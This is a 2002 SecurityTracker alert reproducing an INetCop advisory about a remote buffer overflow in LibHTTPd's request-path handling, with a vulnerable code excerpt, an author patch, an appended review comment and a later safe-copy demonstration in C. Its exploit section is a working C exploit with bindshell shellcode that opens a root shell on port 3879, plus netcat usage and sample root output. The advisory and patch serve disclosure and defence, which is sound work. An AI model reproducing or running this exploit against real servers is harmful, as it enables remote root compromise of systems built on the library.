Category:   Application (Web Server/CGI)  >   LibHTTPd
Vendors:   Hughes Technologies Pty Ltd.
LibHTTPd Buffer Overflow Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1005624
SecurityTracker URL:  http://securitytracker.com/id/1005624
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 14 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.2
Description:   A buffer overflow vulnerability was reported in LibHTTPd. A remote user can execute arbitrary code with the privileges of the server using LibHTTPd.

INetCop Security reported that a buffer overflow exists in 'api.c', where user-supplied data (the URL request path) is copied into a fixed length buffer without checking the size of the data prior to the copy.

A demonstration exploit script is provided in the Source Message.

Impact:   A remote user can execute arbitrary code on the server with the privileges of the daemon that uses LibHTTPd.
Solution:   No solution was available at the time of this entry. The author has provided an unofficial patch, available in the Source Message.
Vendor URL:  www.hughes.com.au/products/libhttpd/
Cause:   Boundary error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Date:  Wed, 13 Nov 2002 17:42:00 +0800
Subject:  Remote Buffer Overflow vulnerability in Lib HTTPd.




	========================================
	INetCop Security Advisory #2002-0x82-003
	========================================


* Title: Remote Buffer Overflow vulnerability in Lib HTTPd.


0x01. Description


LibHTTPD can be used to add basic web server capabilities to an application or embedded device. 
For details, refer to the homepage below. :-)

If you examine 'api.c' in the source code of the libhttpd.a library, you can find the vulnerability.
See httpdProcessRequest() at line 860:

   __
   860  void httpdProcessRequest(server)
   861          httpd   *server;
   862  {
   863          char    dirName[HTTP_MAX_URL],
        ...
   869          server->response.responseLength = 0;
   870          strcpy(dirName, httpdRequestPath(server)); // here.
   --

This results in a fatal vulnerability that allows a root shell to be executed remotely.


0x02. Vulnerable Packages


Vendor site: http://www.hughes.com.au/products/libhttpd/

libhttpd-1.2 
-libhttpd-1.2.tar.gz
+Linux
+Other


0x03. Exploit


This is exploit code that proves it.
Through a remote attack, it gets 'root' privileges.

Use netcat for a very easy exploit.

A simple explanation of the exploit:
Through POST, insert many copies of the &shellcode address.
Next, put the NOPs and shellcode.
(Port:3879 bindshell code)


=== 0x82-Remote.libhttpdxpl.c ===

/*
**
** Lib HTTPd Remote Buffer Overflow exploit
**                             by Xpl017Elz 
** __
** Testing exploit:
**
** bash$ (./0x82-Remote.libhttpdxpl;cat)|nc libhttphost 80
**
** (Ctrl+c)
** punt!
** bash$ nc libhttphost 3879
** uname
** Linux
** id
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),
** 3(sys),4(adm),6(disk),10(wheel)
** exit
** bash$ 
**
** -- 
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. 
** My World: http://x82.i21c.net
**
*/

#include <stdio.h>
int main(/* args? */)
{ 
    int shadd2r;
    char b1ndsh[] = /* 129byte bindshellcode */
	"\211\3451\322\262f\211\3201\311\211\313C\211]\370C\211]\364K\211M\374\215M"
	"\364\315\2001\311\211E\364Cf\211]\354f\307E\356\017'\211M\360\215E\354\211E"
    	"\370\306E\374\020\211\320\215M\364\315\200\211\320CC\315\200\211\320C\315"
	"\200\211\3031\311\262?\211\320\315\200\211\320A\315\200\353\030^\211u"
	"\b1\300\210F\007\211E\f\260\013\211\363\215M\b\215U\f\315\200\350\343\377"
	"\377\377/bin/sh";
    //--- POST &shellcode ---//
    fprintf(stdout,"POST ");
    for(shadd2r=0;shadd2r<0x408;shadd2r+=4)
    {/* rEDhAT Default: 0x804e482,
	Debian Address? */
	fprintf(stdout,"\202\344\004\b");
    }
    fprintf(stdout,"\r\n");
    //--- NOP,shellcode ---//
    for(shadd2r=0;shadd2r<0x3e8;shadd2r++)
    {/* SSSSSSSS...SSSSSSSSS;;; */
	fprintf(stdout,"S");
    }
    fprintf(stdout,"%s\r\nx0x\r\nx82\r\nl0l\r\n",b1ndsh);
}

=== eof ===


0x04. Patch


=== api.patch ===

--- api.c       Sat Nov  9 20:06:30 2002
+++ api.patch.c Sat Nov  9 20:05:33 2002
@@ -867,7 +867,7 @@
	httpContent *entry;
 
	server->response.responseLength = 0;
-	strcpy(dirName, httpdRequestPath(server));
+	strncpy(dirName, httpdRequestPath(server), HTTP_MAX_URL);
	cp = rindex(dirName, '/');
	if (cp == NULL)
	{
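
Review bot: The strncpy() bound on the added line is HTTP_MAX_URL, the full size of dirName (declared as char dirName[HTTP_MAX_URL] in the excerpt above), so a request path of HTTP_MAX_URL bytes or more fills the buffer with no terminating NUL and the rindex(dirName, '/') call on the next line then reads past the end of the array. Bound the copy to HTTP_MAX_URL - 1 and set dirName[HTTP_MAX_URL - 1] = '\0' afterwards, or check the length of httpdRequestPath(server) first and reject over-long requests rather than silently truncating the path.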

=== eof ===


P.S.: Sorry for my poor English.


--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,
              xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org (Korean hacking game)
             My World: http://x82.i21c.net

GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y
--
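
The copy pattern at issue in this advisory, as an added example that is not part of the original advisory or of LibHTTPd's code: it shows that strncpy() with a bound equal to the buffer size leaves the buffer unterminated for an over-long path, next to a copy that rejects such paths. DEMO_MAX_URL, strncpy_terminates() and copy_request_path() are hypothetical names, and the 16-byte size is an assumed stand-in for HTTP_MAX_URL.

```c
#include <stdio.h>
#include <string.h>

#define DEMO_MAX_URL 16  /* assumed stand-in for HTTP_MAX_URL */

/* Repeats the patched call shape, strncpy(dst, src, sizeof dst), on a
 * local buffer. Returns 1 if a NUL ends up inside the buffer, else 0. */
int strncpy_terminates(const char *path)
{
    char dirName[DEMO_MAX_URL];

    memset(dirName, 'X', sizeof dirName);
    strncpy(dirName, path, DEMO_MAX_URL);
    return memchr(dirName, '\0', sizeof dirName) != NULL;
}

/* Hypothetical hardened copy: a path that does not fit, terminator
 * included, is rejected rather than truncated. Returns 0 or -1. */
int copy_request_path(char *dst, size_t dstsize, const char *path)
{
    const char *end;

    if (dst == NULL || path == NULL || dstsize == 0)
        return -1;
    end = memchr(path, '\0', dstsize);  /* looks at no more than dstsize bytes */
    if (end == NULL) {
        dst[0] = '\0';                  /* leave a valid empty string behind */
        return -1;                      /* caller should refuse the request */
    }
    memcpy(dst, path, (size_t)(end - path) + 1);
    return 0;
}

int main(void)
{
    /* Constructed sample paths: 11 and 17 characters long. */
    const char *samples[] = { "/index.html", "/0123456789abcdef" };
    char dirName[DEMO_MAX_URL];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-18s strncpy terminated=%d  checked copy=%d\n", samples[i],
               strncpy_terminates(samples[i]),
               copy_request_path(dirName, sizeof dirName, samples[i]));
    return 0;
}
```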


Copyright 2012, SecurityGlobal.net LLC